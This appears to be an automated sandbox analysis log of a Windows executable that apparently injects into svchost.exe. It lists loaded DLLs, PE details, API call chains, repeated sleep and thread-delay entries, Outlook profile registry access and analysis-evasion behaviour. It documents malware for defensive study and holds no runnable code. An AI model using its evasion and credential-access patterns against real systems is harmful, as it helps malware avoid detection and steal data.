Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: BgroUcYHpy.exe

Static file information: File size 80740352 > 1048576

Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: BgroUcYHpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: BgroUcYHpy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: BgroUcYHpy.exe, 00000000.00000003.2055449537.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, BgroUcYHpy.exe, 00000000.00000003.2055552179.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BgroUcYHpy.exe, 00000000.00000003.2055449537.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, BgroUcYHpy.exe, 00000000.00000003.2055552179.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp

Source: BgroUcYHpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: BgroUcYHpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: BgroUcYHpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: BgroUcYHpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: BgroUcYHpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00254B37 LoadLibraryA,GetProcAddress,

0_2_00254B37

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00278945 push ecx; ret	0_2_00278958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041BFCD pushad ; ret	2_2_0041BFCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CE558 push eax; iretd	2_2_078CE559

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_002548D7
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_002D5376

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00273187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00273187

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

API/Special instruction interceptor: Address: 147EC0C

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 53A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 53A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 73A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599213	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598888	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598777	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598530	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598416	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597211	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595944	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595690	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595557	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595449	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 2393			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 7459			Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102094

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

API coverage: 4.6 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3636	Thread sleep count: 2393 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3636	Thread sleep count: 7459 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599213s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598888s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598777s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598530s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598416s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597327s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597211s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595944s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595690s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595557s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595449s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3332	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_002B445A
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BC6D1 FindFirstFileW,FindClose,	0_2_002BC6D1
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_002BC75C
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BEF95
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF0F2
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BF3F3
